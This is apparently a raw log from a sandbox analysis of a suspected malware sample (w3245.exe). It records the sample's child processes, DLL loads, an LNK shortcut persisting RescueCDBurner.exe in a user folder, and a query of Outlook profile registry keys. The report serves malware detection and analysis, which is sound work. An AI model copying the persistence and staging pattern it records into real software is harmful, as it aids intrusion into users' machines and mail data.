Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1984,i,12396277131636632407,2205267590406277603,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6512 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6748 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7392 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1992,i,12794935825972523689,1062421692314691261,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1984,i,5351310162108678119,10159255576747894809,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6644 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6644 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1992,i,12794935825972523689,1062421692314691261,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1984,i,5351310162108678119,10159255576747894809,262144 /prefetch:3
Source: C:\Users\user\Desktop\w3245.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\w3245.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\w3245.exe | Section loaded: msi.dll
Source: C:\Users\user\Desktop\w3245.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\w3245.exe | Section loaded: cabinet.dll
Source: C:\Users\user\Desktop\w3245.exe | Section loaded: msxml3.dll
Source: C:\Users\user\Desktop\w3245.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\w3245.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\w3245.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\w3245.exe | Section loaded: feclient.dll
Source: C:\Users\user\Desktop\w3245.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\w3245.exe | Section loaded: apphelp.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: msi.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: version.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: cabinet.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: msxml3.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: wldp.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: profapi.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: feclient.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: iertutil.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: textinputframework.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: coremessaging.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: ntmarta.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: coremessaging.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: wintypes.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: wintypes.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: wintypes.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Section loaded: apphelp.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: apphelp.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: starburn.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: qtcore4.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: qtgui4.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: qtnetwork4.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: qtxml4.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: dbghelp.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: dbgcore.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: winmm.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: pla.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: pdh.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: tdh.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: cabinet.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: wevtapi.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: shdocvw.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: starburn.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: qtcore4.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: qtgui4.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: qtnetwork4.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: qtxml4.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: pla.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: starburn.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: qtcore4.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: qtgui4.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: qtnetwork4.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: qtxml4.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: pla.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\w3245.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32
Source: fkefe.4.dr | LNK file: ..\..\Roaming\TaskManage\RescueCDBurner.exe
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: w3245.exe | Static file information: File size 15806278 > 1048576
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | File opened: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\msvcr100.dll
Source: w3245.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: w3245.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: w3245.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: w3245.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: w3245.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: w3245.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: w3245.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: w3245.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: w3245.exe, 00000000.00000000.1658861478.000000000080B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp, w3245.exe, 00000001.00000000.1665459198.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
